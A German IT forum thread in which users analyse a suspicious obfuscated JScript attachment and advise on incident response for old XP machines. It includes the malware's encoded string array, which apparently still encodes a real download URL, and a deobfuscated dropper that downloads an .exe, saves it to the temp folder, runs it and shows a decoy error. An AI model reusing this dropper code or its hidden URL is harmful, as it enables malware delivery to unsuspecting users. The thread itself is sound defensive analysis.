'\x5a\x32\x56\x69\x59\x32\x6b\x3d', '\x51\x30\x78\x79\x53\x55\x55\x3d', '\x51\x6d\x4a\x58\x5a\x30\x34\x3d', '\x5a\x33\x6c\x71\x63\x48\x67\x3d', '\x62\x6d\x39\x4d\x62\x32\x38\x3d', '\x61\x32\x6c\x32\x61\x45\x45\x3d', '\x62\x56\x46\x79\x52\x48\x41\x3d', '\x63\x6b\x4a\x69\x53\x47\x77\x3d', '\x56\x6d\x35\x70\x53\x30\x59\x3d', '\x55\x57\x64\x49\x55\x57\x30\x3d', '\x64\x45\x5a\x73\x55\x45\x51\x3d', '\x54\x47\x5a\x42\x63\x6e\x6b\x3d', '\x51\x55\x52\x6b\x52\x6e\x49\x3d', '\x61\x6e\x5a\x77\x59\x58\x51\x3d', '\x57\x47\x39\x4b\x54\x55\x6b\x3d', '\x63\x57\x39\x55\x55\x32\x77\x3d', '\x59\x58\x64\x50\x64\x48\x6b\x3d', '\x56\x47\x70\x32\x55\x6e\x51\x3d', '\x53\x58\x5a\x34\x64\x31\x6b\x3d', '\x5a\x57\x46\x75\x52\x48\x6f\x3d', '\x5a\x47\x31\x55\x62\x6b\x6f\x3d', '\x63\x6d\x46\x75\x5a\x47\x39\x74', '\x64\x47\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x3d', '\x63\x33\x56\x69\x63\x33\x52\x79', '\x52\x32\x56\x30\x55\x33\x42\x6c\x59\x32\x6c\x68\x62\x45\x5a\x76\x62\x47\x52\x6c\x63\x67\x3d\x3d', '\x52\x6d\x70\x46\x54\x56\x67\x3d', '\x63\x48\x4e\x7a\x55\x47\x4d\x3d', '\x56\x32\x31\x50\x62\x6d\x77\x3d', '\x59\x55\x5a\x32\x64\x6e\x41\x3d', '\x5a\x32\x74\x70\x54\x30\x30\x3d', '\x63\x57\x78\x6d\x52\x56\x45\x3d', '\x56\x47\x31\x79\x53\x55\x55\x3d', '\x65\x6e\x4e\x54\x5a\x47\x30\x3d', '\x53\x48\x4e\x6c\x55\x30\x55\x3d', '\x57\x6e\x4a\x4c\x61\x6e\x51\x3d', '\x59\x6c\x46\x55\x61\x56\x55\x3d', '\x65\x6c\x6c\x78\x5a\x57\x77\x3d', '\x5a\x31\x56\x46\x64\x45\x30\x3d', '\x64\x46\x68\x76\x52\x56\x55\x3d', '\x52\x58\x4a\x43\x57\x6b\x6b\x3d', '\x52\x56\x42\x59\x62\x6d\x34\x3d', '\x54\x6b\x46\x30\x65\x48\x41\x3d', '\x59\x33\x42\x7a\x63\x46\x67\x3d', '\x63\x58\x70\x49\x64\x48\x41\x3d', '\x62\x6b\x74\x56\x54\x48\x49\x3d', '\x52\x6c\x68\x4b\x64\x6e\x59\x3d', '\x5a\x55\x52\x71\x62\x47\x4d\x3d', '\x52\x55\x5a\x71\x61\x56\x6f\x3d', '\x53\x30\x78\x5a\x62\x55\x45\x3d', '\x63\x6b\x6c\x44\x53\x47\x55\x3d', '\x63\x58\x68\x71\x63\x56\x55\x3d', '\x64\x31\x4a\x6b\x51\x57\x30\x3d', '\x65\x47\x78\x79\x63\x55\x51\x3d', '\x53\x6b\x52\x30\x57\x6c\x41\x3d', '\x64\x6e\x64\x5a\x61\x56\x67\x3d', '\x64\x6b\x35\x5a\x56\x30\x34\x3d', '\x53\x47\x5a\x59\x57\x6c\x67\x3d', '\x5a\x48\x5a\x48\x65\x45\x59\x3d', '\x56\x56\x52\x72\x57\x6c\x6b\x3d', '\x53\x30\x74\x54\x59\x6b\x51\x3d', '\x65\x55\x74\x6a\x55\x45\x55\x3d', '\x63\x56\x68\x32\x5a\x47\x73\x3d', '\x54\x57\x46\x44\x61\x31\x63\x3d', '\x4e\x33\x77\x7a\x66\x44\x46\x38\x4e\x48\x77\x31\x66\x44\x42\x38\x4e\x6e\x77\x79', '\x64\x33\x4e\x48\x63\x6d\x63\x3d', '\x51\x32\x64\x56\x63\x32\x4d\x3d', '\x64\x46\x6c\x36\x63\x45\x4d\x3d', '\x62\x30\x5a\x70\x54\x32\x51\x3d', '\x4d\x48\x77\x7a\x66\x44\x46\x38\x4e\x58\x77\x79\x66\x44\x51\x3d', '\x55\x46\x4a\x76\x62\x30\x63\x3d', '\x64\x6e\x42\x55\x52\x45\x49\x3d', '\x56\x47\x68\x6c\x63\x6d\x55\x67\x64\x32\x46\x7a\x49\x47\x46\x75\x49\x47\x56\x79\x63\x6d\x39\x79\x49\x47\x39\x77\x5a\x57\x35\x70\x62\x6d\x63\x67\x64\x47\x68\x70\x63\x79\x42\x6b\x62\x32\x4e\x31\x62\x57\x56\x75\x64\x43\x34\x67\x56\x47\x68\x6c\x49\x47\x5a\x70\x62\x47\x55\x67\x61\x58\x4d\x67\x5a\x47\x46\x74\x59\x57\x64\x6c\x5a\x43\x42\x68\x62\x6d\x51\x67\x59\x32\x39\x31\x62\x47\x51\x67\x62\x6d\x39\x30\x49\x47\x4a\x6c\x49\x48\x4a\x6c\x63\x47\x46\x70\x63\x6d\x56\x6b\x49\x43\x68\x6d\x62\x33\x49\x67\x5a\x58\x68\x68\x62\x58\x42\x73\x5a\x53\x77\x67\x61\x58\x51\x67\x64\x32\x46\x7a\x49\x48\x4e\x6c\x62\x6e\x51\x67\x59\x58\x4d\x67\x59\x57\x34\x67\x5a\x57\x31\x68\x61\x57\x77\x67\x59\x58\x52\x30\x59\x57\x4e\x6f\x62\x57\x56\x75\x64\x43\x42\x68\x62\x6d\x51\x67\x64\x32\x46\x7a\x62\x69\x64\x30\x49\x47\x4e\x76\x63\x6e\x4a\x6c\x59\x33\x52\x73\x65\x53\x42\x6b\x5a\x57\x4e\x76\x5a\x47\x56\x6b\x4b\x53\x34\x3d', '\x63\x30\x70\x72\x53\x31\x4d\x3d', '\x57\x47\x35\x4b\x55\x33\x6b\x3d', '\x51\x6e\x56\x31\x63\x58\x55\x3d', '\x54\x6d\x39\x30\x49\x46\x4e\x31\x63\x48\x42\x76\x63\x6e\x52\x6c\x5a\x43\x42\x47\x61\x57\x78\x6c\x49\x45\x5a\x76\x63\x6d\x31\x68\x64\x41\x3d\x3d', '\x51\x6e\x70\x48\x54\x31\x45\x3d', '\x55\x47\x39\x77\x64\x58\x41\x3d', '\x51\x33\x4a\x6c\x59\x58\x52\x6c\x54\x32\x4a\x71\x5a\x57\x4e\x30', '\x53\x45\x52\x46\x56\x32\x73\x3d', '\x53\x6d\x56\x72\x5a\x58\x6f\x3d', '\x56\x31\x4e\x6a\x63\x6d\x6c\x77\x64\x43\x35\x54\x61\x47\x56\x73\x62\x41\x3d\x3d', '\x64\x30\x56\x58\x55\x6b\x67\x3d', '\x52\x6c\x4a\x75\x62\x6d\x30\x3d', '\x64\x47\x64\x4b\x52\x32\x55\x3d', '\x62\x57\x4e\x77\x51\x6b\x49\x3d', '\x55\x45\x68\x46\x53\x6d\x77\x3d', '\x54\x56\x4e\x59\x54\x55\x77\x79\x4c\x6c\x68\x4e\x54\x45\x68\x55\x56\x46\x41\x3d', '\x53\x33\x70\x5a\x52\x55\x55\x3d', '\x52\x30\x56\x55', '\x65\x48\x4e\x36\x64\x58\x49\x3d', '\x61\x45\x4a\x6e\x5a\x57\x59\x3d', '\x65\x6e\x52\x44\x56\x31\x4d\x3d', '\x51\x58\x52\x68\x63\x56\x59\x3d', '\x57\x55\x5a\x6f\x65\x55\x77\x3d', '\x52\x45\x64\x55\x51\x6c\x67\x3d', '\x64\x47\x56\x54\x63\x6b\x49\x3d', '\x56\x6d\x6c\x4e\x57\x46\x63\x3d', '\x57\x6e\x5a\x4c\x52\x58\x67\x3d', '\x54\x6b\x64\x33\x65\x48\x63\x3d', '\x52\x57\x39\x55\x5a\x46\x6f\x3d', '\x5a\x55\x68\x30\x57\x6c\x6b\x3d', '\x62\x33\x42\x6c\x62\x67\x3d\x3d', '\x63\x32\x56\x75\x5a\x41\x3d\x3d', '\x63\x33\x52\x68\x64\x48\x56\x7a', '\x55\x6d\x56\x7a\x63\x47\x39\x75\x63\x32\x56\x43\x62\x32\x52\x35', '\x55\x6e\x56\x75', '\x59\x30\x78\x75\x64\x48\x4d\x3d', '\x56\x58\x42\x58\x57\x58\x6b\x3d', '\x54\x46\x5a\x79\x63\x48\x41\x3d', '\x56\x33\x42\x6c\x62\x6b\x77\x3d', '\x55\x32\x4e\x79\x61\x58\x42\x30\x61\x57\x35\x6e\x4c\x6b\x5a\x70\x62\x47\x56\x54\x65\x58\x4e\x30\x5a\x57\x31\x50\x59\x6d\x70\x6c\x59\x33\x51\x3d', '\x53\x57\x52\x70\x53\x30\x51\x3d', '\x59\x6b\x52\x61\x55\x47\x6b\x3d', '\x61\x33\x4e\x75\x56\x6b\x4d\x3d', '\x4c\x6d\x56\x34\x5a\x51\x3d\x3d', '\x62\x47\x56\x4b\x53\x33\x6f\x3d', '\x4e\x6e\x77\x7a\x66\x44\x46\x38\x4d\x6e\x77\x31\x66\x44\x42\x38\x4e\x48\x77\x33', '\x54\x31\x64\x79\x52\x32\x38\x3d', '\x51\x55\x52\x50\x52\x45\x49\x75\x55\x33\x52\x79\x5a\x57\x46\x74', '\x64\x45\x4e\x74\x59\x57\x55\x3d', '\x62\x6b\x68\x46\x64\x45\x38\x3d', '\x64\x6d\x70\x73\x54\x56\x51\x3d', '\x5a\x57\x70\x33\x53\x6c\x45\x3d', '\x64\x30\x4a\x4d\x52\x47\x34\x3d', '\x63\x6b\x70\x72\x5a\x45\x38\x3d', '\x53\x57\x31\x49\x61\x46\x67\x3d', '\x57\x55\x64\x72\x52\x46\x49\x3d', '\x52\x6e\x46\x49\x62\x58\x55\x3d', '\x55\x30\x4a\x57\x55\x32\x59\x3d', '\x65\x6b\x5a\x68\x54\x55\x55\x3d', '\x54\x56\x52\x44\x62\x58\x59\x3d', '\x62\x48\x68\x61\x52\x58\x45\x3d', '\x61\x48\x52\x74\x64\x47\x34\x3d', '\x64\x6c\x42\x75\x53\x47\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x31\x6c\x61\x57\x74\x7a\x4c\x6d\x52\x72\x4c\x31\x5a\x45\x59\x6c\x51\x74\x62\x6c\x6c\x66\x61\x56\x70\x34\x63\x55\x34\x74\x5a\x6b\x46\x34\x4c\x32\x64\x68\x58\x7a\x67\x76', '\x52\x45\x74\x77\x56\x6e\x4d\x3d', '\x62\x47\x68\x6f\x61\x6b\x63\x3d', '\x64\x6c\x70\x70\x65\x48\x45\x3d', '\x64\x48\x64\x31\x55\x57\x51\x3d', '\x62\x57\x39\x6d\x5a\x6d\x63\x3d', '\x54\x56\x68\x74\x52\x46\x63\x3d', '\x5a\x31\x64\x4c\x52\x30\x6b\x3d', '\x54\x55\x68\x51\x65\x6e\x6b\x3d', '\x64\x32\x52\x6f\x61\x47\x45\x3d', '\x63\x48\x56\x75\x63\x47\x51\x3d', '\x59\x57\x31\x46\x63\x46\x51\x3d', '\x51\x33\x42\x5a\x51\x32\x77\x3d', '\x53\x6d\x70\x30\x63\x55\x45\x3d', '\x5a\x58\x64\x44\x54\x58\x51\x3d', '\x53\x6b\x5a\x6e\x5a\x33\x51\x3d', '\x54\x57\x46\x50\x59\x6c\x63\x3d', '\x64\x45\x4e\x36\x52\x6e\x6b\x3d'];
Sieht mir verdächtig nach einer Notation eines Programms aus.
Also übersetzt. Ich würde vermuten, dass dieses Script mittels ActiveX eine Datei anlegt, dort Binärcode reinschiebt und eben diesen Mist ausführt. Außerdem tippe ich darauf, dass Zeug aus dem Netz nachgeladen wird. Und damit das nicht ganz so leicht auffällt werden die entscheidenen Schritte verschlüsselt.

Frage, was habt Ihr denn für ein System? Ich war immer der Meinung, dass ActiveX schon seit hundert Jahren nicht mehr unterstützt wird.
Das lief früher mal unter dem alten Internetexplorer.
Da konnte man lustige Dinge machen.
Ich hab mal etwas programmiert, das von einer Webseite heraus den Windowsdesktop durch eine von mir programmierte Alternative ersetzt.

LG
 
Gefällt mir: PaRo
#3
Danke erstmal für die superschnelle Antwort!

Es laufen teilweise noch sehr alte Systeme. Einige Maschinen haben in ihrer integrierten Steuerungskonsole im Grunde XP laufen.
Da wäre eben die Frage ob sich dieses Ding über unser Netz selbstständig verbreiten kann, bzw. da es auf einem, sich auf dem neusten Stand befindenden Mitarbeiterrechner, ausgeführt wurde überhaupt aktiv wurde.
Naja wird eine interessante Woche.

LG
 

asc

Well-Known Member
c-b Experte
#4
Das Script sendet Informationen an bestimmte Sites und holt sich entsprechend für die jeweilige Plattform passende Malware.
Nimm den Rechner am besten vom Netz und lass mal Malware Bytes drüberlaufen (ist eigl. immer ganz aktuell).

Hab den Code nur grob überflogen, da die Verschleierung ziemlich nervig ist.
Bei Interesse könnte ich das auch komplett auseinander nehmen (ist ziemlich simpel), ist aber vermutlich nicht notwendig.

Der Schadcode funktioniert im übrigen nur in Internet Explorer und nur wenn der Betroffene die Sicherheitswarnungen ("Ausführen von ActiveX-Steuerelementen") bestätigt hat, es sei denn es wurde per Domänenrichtline irgendwas verpfuscht oder der Benutzer hat es selbst dauerhaft aktiviert...

Es laufen teilweise noch sehr alte Systeme. Einige Maschinen haben in ihrer integrierten Steuerungskonsole im Grunde XP laufen.
Ich kenne die Situation, dass Firmen wegen veralteter Software auf XP/7 festgenagelt werden (vor allem in der Industrie). Aber bitte hängt diese Kisten nicht ins Internet oder versucht zumindest diesen Mist zu virtualisieren wenn es geht :(
 
Zuletzt bearbeitet:
Gefällt mir: PaRo
#5
Herzlichen Dank!
Wir haben den Rechner sofort vom Netz genommen und diverse Scanner drüberlaufen lassen. Da wurde nichts gefunden, aber da wir keine Ahnung hatten worum es sich dabei handelt, hätte es sein können das es sich entweder schon verbreitet oder gar nicht entdeckt wird.

Der Hinweis, dass es nur im IE funktioniert und mit dem Bestätigen der Sicherheitswarnung ist super. Jetzt sollten wir rausfinden können ob es tatsächlich ausgeführt wurde.

Die laufen in einem eigenen VLAN, das ist aber auch schon alles. Da hängt ein unglaublicher Rattenschwanz dran.

Danke asc und beepsoft für die Hilfe!
 

Jan Krüger

Well-Known Member
c-b Team
c-b Experte
#6
Habe auch mal eine kleine Analyse gemacht.

Der Code enthält fünf verschleierte Links auf folgende Malware, davon sind drei Stand jetzt noch funktionsfähig:
https://www.virustotal.com/gui/file/2ed3333ed22827d595649d0751bf63c537c9d30f2fee49b826a91db2db4aa876

Hier der entschleierte Code - einige Teile des Codes konnten niemals ausgeführt werden, die habe ich entfernt. Ich darf vielleicht noch anmerken, dass der Code etwas stümperhaft geschrieben und auch etwas stümperhaft verschleiert wurde - das alles wieder zurückzuspulen war geradezu trivial, wenn auch eine gewisse Menge Fleißarbeit...

Javascript:
function get_url(url, callback) {
    try {
        var P = new ActiveXObject('MSXML2.XMLHTTP');
        P.open('GET', url, false);
        P.send();
        if (P.status == 200) {
            return callback(P.responseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (V) {
            return callback(null, true);
        }
    }
}

function get_payload(callback) {
    try {
        get_url('http://url-1-zensiert.invalid/', function(response, error) {
            if (!error) {
                var m = GetTempFileName();
                if (m) {
                    var n = new ActiveXObject('ADODB.Stream');
                    n.Open();
                    n.Type = 0x1;
                    n.Write(data);
                    n.Position = 0x0;
                    n.SaveToFile(m, 0x2);
                    n.Close();
                    return callback(m, false);
                } else {
                    return callback(null, true);
                }
            } else {
                get_url('http://url-2-zensiert.invalid/', function(response, error) {
                    var bd = {};
                    if (!error) {
                        return callback(response, false);
                    } else {
                        get_url('http://url-3-zensiert.invalid/', function(response, error) {
                            if (!error) {
                                return callback(response, false);
                            } else {
                                get_url('http://url-4-zensiert.invalid/', function(response, error) {
                                    if (!error) {
                                        return callback(response, false);
                                    } else {
                                        get_url('http://url-5-zensiert.invalid/', function(response, error) {
                                            if (!error) {
                                                return callback(response, false);
                                            } else {
                                                return callback(null, true);
                                            }
                                        });
                                    }
                                });
                            }
                        });
                    }
                });
            }
        });
    } catch (d6) {
        return callback(null, true);
    }
}

function GetTempFileName() {
    try {
        var fso = new ActiveXObject('Scripting.FileSystemObject');
        return fso.GetSpecialFolder(0x2) + '\\' + Math.random().toString(0x24).substr(0x2, 0x9) + '.exe';
    } catch (dn) {
        return false;
    }
}

function WriteToTempFile(data, callback) {
    try {
        var name = GetTempFileName();
        if (name) {
            var file = new ActiveXObject('ADODB.Stream');
            file.Open();
            file.Type = 0x1;
            file.Write(data);
            file.Position = 0x0;
            file.SaveToFile(name, 0x2);
            file.Close();
            return callback(name, false);
        } else {
            return callback(null, true);
        }
    } catch (dH) {
        return callback(null, true);
    }
}

get_payload(function(data, error) {
    var WshShell = WScript.CreateObject('WScript.Shell');
    var Text = 'There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn\'t correctly decoded).';
    var Title = 'Not Supported File Format';
    var Res = WshShell.Popup(Text, 0x0, Title, 0x40);
    if (!error) {
        WriteToTempFile(data, function(filename, error) {
            if (!error) {
                try {
                    var shell = new ActiveXObject('WScript.Shell');
                    shell.Run(filename);
                } catch (dW) {}
            }
        });
    }
});
 
Oben